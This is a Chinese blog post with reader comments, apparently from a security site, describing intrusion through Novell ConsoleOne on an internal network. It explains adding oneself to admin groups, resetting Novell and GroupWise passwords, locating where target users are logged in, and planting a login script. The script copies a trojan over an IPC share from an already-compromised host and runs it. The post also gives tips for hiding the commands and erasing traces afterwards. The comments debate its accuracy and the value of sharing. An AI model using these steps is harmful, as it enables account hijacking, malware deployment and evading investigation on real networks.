Novell ConsoleOne Hack Evolution

2012-11-02 142924人围观 ,发现 10 个不明物体 其他

Author: CasperKid@Insight-Labs.org
前言:

1.纯干货,估计会碰到这个环境的人不多,目前也只有一个朋友和我遇到过同类环境。
2.这个是比较早的时候写的总结,在team里分享,还没公开过,
3.看freebuf上基本上渗透都是流程的东东,没有干货,就索性自己来篇吧。
4.至于Novell是啥,ConsoleOne是啥,就大家自己去搜吧,这个东东普适范围不大。

注意: 文中图片的分辨率还是很高的,大家可以通过放大网页的方式看到图片细节。

正文
首先Novell账号和groupwise账号都可以一个账号同时在不同的workstation登陆。
这样可以即使对方人员在使用账号时,我们也能同时使用该账户而不会使对方察觉到异常。
接下来是Novell ConsoleOne Hack的正文部分。

有两个前提需要注意:

1. Novell的高权限账号,具体要多大权限我没法细化,至少有足够权限编辑目标账号属性。

可以在账号Memberships属性里查看自己账号所属组别,如果发现自己账号无权编辑指定节点的账号,但自己账号本身权限足够大,可以观察指定节点的管理员属于哪些组别里,然后手动将自己账号也追加进这些组别里,便有足够权限编辑该节点的账号了。

2. ConsoleOne的版本和插件不能太老,不然会出现有些账号属性标签不会显示出来的情况。

如下图中在PC-A上的ConsoleOne就无法看到Groupwise标签,而PC-B上就能看到。
可能同时还会跟是否加载了Groupwise的gwdomain.db有关,但具体情况还没测试出来。

Novell ConsoleOne Hack可以办到的事:

A. 可修改Novell账号密码和groupwise账号密码。
B. 可通过ConsoleOne定位目标账号现在是否处于登陆状态,或该账户在哪些地方已登陆。
C. 可修改Novell账号的Login Scripts进行指定账号入侵。

<A> 可修改Novell账号密码和groupwise账号密码。

对指定账号双击查看属性后,Login Methods标签里可修改Novell账号的密码。

Groupwise标签里可修改Groupwise账号的密码,如果没有这个标签,情况见前提2。

<B> 可通过ConsoleOne定位目标账号现在是否处于登陆状态,或该账户在哪些地方已登陆。


对用户点右键,其中有个Remote Management选项。
如果该用户当前并没处于登陆状态,会有如下提示。

如果该用户处于登陆状态,将会有以下界面。
其中如果是同一账号多个workstation登陆的,可在IP的拉下按键那里看到其他登陆IP地址。
这样也可以帮我们定位目标账号所处网络位置,去进一步选择和计划渗透方案。

<C> 可修改Novell账号的Login Scripts 进行指定账号入侵

附上一段Login Scripts实例
—————— code ——————

#C:\windows\system32\cmd.exe /c “net use \\IP /u:username passwd” > C:\recycler\null
#C:\windows\system32\cmd.exe /c “copy \\IP\c$\xxx.exe c:\xxx.exe” > C:\recycler\null
#C:\windows\system32\cmd.exe /c “c:\xxx.exe” > C:\recycler\null
#C:\windows\system32\cmd.exe /c “net use \\IP /del /y” > C:\recycler\null
#C:\windows\system32\cmd.exe /c “echo 0” > C:\recycler\null

注意:

\\x.x.x.x 为已经入侵的主机,要保证我们要入侵的目标账号网络环境能访问到x.x.x.x的网络,
然后把木马放在x.x.x.x上面,通过IPC去将它从x.x.x.x上拷贝到目标账号的PC上,
再执行木马,最后删除IPC连接。
这里每条命令都用了 > C:\recycler\null 输出重定向,是因为当用户登录Novell Client时,会闪显cmd窗口。
而使用输出重定向后,用户就看不到具体执行了什么命令。
而且输出重定向是用的覆盖管道符 > ,而用的不是追加管道符 >> ,
当前4条命令执行完了后,执行第5条命令时,这时的null文件里内容为0。
即时用户发现了蹊跷或什么,也难以追查。
(PS: 至于为什么要这么绕,不一次或一句命令解决,相信你去实践过就明白我的苦衷了)

使用Login Scripts Hack的时候要注意盯着目标是否上线,一旦上线后,
立刻去ConsoleOne清除Login Scripts,避免被发觉异常后管理员去调查,而且连上对方PC后删除掉null文件。

具体Login Script还可以如何写,用哪些语言来写,可以去搜索 Novell Login Scripts关键字,会有相关手册,指明Login Scripts需要符合哪些格式来编写。

At Last, 还有些东西可以继续挖掘,后来我懒就没写了,大家自己去YY吧。

文章原始URL: http://insight-labs.org/?p=557

这些评论亮了

  • CasperKid (1级) 端茶倒水的小萝莉 回复
    @nothing =..=~ 有大牛出来拍砖这种事是最有意思的啦~ 非常欢迎~
    1. Novell 这个东西的确是老古董了 哈哈 所以很少人会遇到
    2. NDS 整篇文字我貌似没写过它没有域吧 Novell整个体系都是在NDS之上架设出来的
    | 包括像Groupwise啊 文件存储系统啊 其他的一些应用
    | 就像类比windows域里的Outlook神马的
    | 至于Login Script为啥写成了Login Script估计是当时我比较二
    | 多打了个s后也就习惯性地之后多打了个s了 让大牛见笑了 哟西~
    3. 获得控制台权限 每个内网环境的情况都不同 就已经不属于这篇文字的范围了
    | 不管你是搞了服务器拿到通用账号也好 还是直接社工管理员也好 途径千变万化啦
    4. 至于精华这个事呢 也不是我决定的 哈哈 如果大牛觉得比较介意 我也可以找freebuf的同学取消
    | 然后对Usage的看法 本菜鸟是这样认为的 在内网渗透里 渗透可以大方向分两类
    | A.利用内网本身网络漏洞去渗透 B.利用内网本身管理系统去渗透
    | Usage在我的理解属于B类 动静会比A小一些 安全一些 就像与其在内网用RAT 我会更愿意用IPC
    | 我第一次接触这个环境的时候 基本上找不出啥比较直接的hack资料 因为太古董了
    | 所以个人还是觉得分享 并不大众的一些技巧或哪怕是Usage总结 也不是坏事
    | 渗透可能是漏洞利用 奇技淫巧 但经验分享 也是很重要的一种交流 :)
    | 如果其他一些Novell Hack Skill 也欢迎大牛分享出来 我学习学习
    5. 对分享的一些想法
    | 以前我有想过要不要分享RFID的东西 我觉得比我研究得更深的人多的事 我分享的也是毛皮
    | 但是比我研究得很深的人 绝大部分人其实并不分享出来 我就自己想好了
    | 我愿意分享自己的总结 哪怕是在大牛眼里可能没啥含量的 但可能会指引很多刚入门的人
    | 即使会被拍砖神马的 大不了脸皮厚点就是了 哈哈 :)
    )16( 亮了
  • 小鱼修炼中 回复
    CK,敢不敢别那么多马赛克。。话说我有张你的半身马赛克照片,肿么办。。。。太内涵了嘛。。。。
    )11( 亮了
  • 拜膜阿里巴巴牛
    )9( 亮了
  • nothing 回复
    1.Novell 这玩意儿在Win98时代很流行。
    2.NDS您老告诉我没有域?Login Script那边凑字数也就算了,何必写个错的
    3.首先确定你有能力获得控制台权限,且清理掉C2的安全日志在继续吧
    4.Usage在Freebuf都能精华? - -
    )8( 亮了
  • mickey 回复
    顶CK,赞分享
    @nothing 求经验,光说不练是假把式 :)
    )8( 亮了
发表评论

已有 10 条评论

取消
Loading...
css.php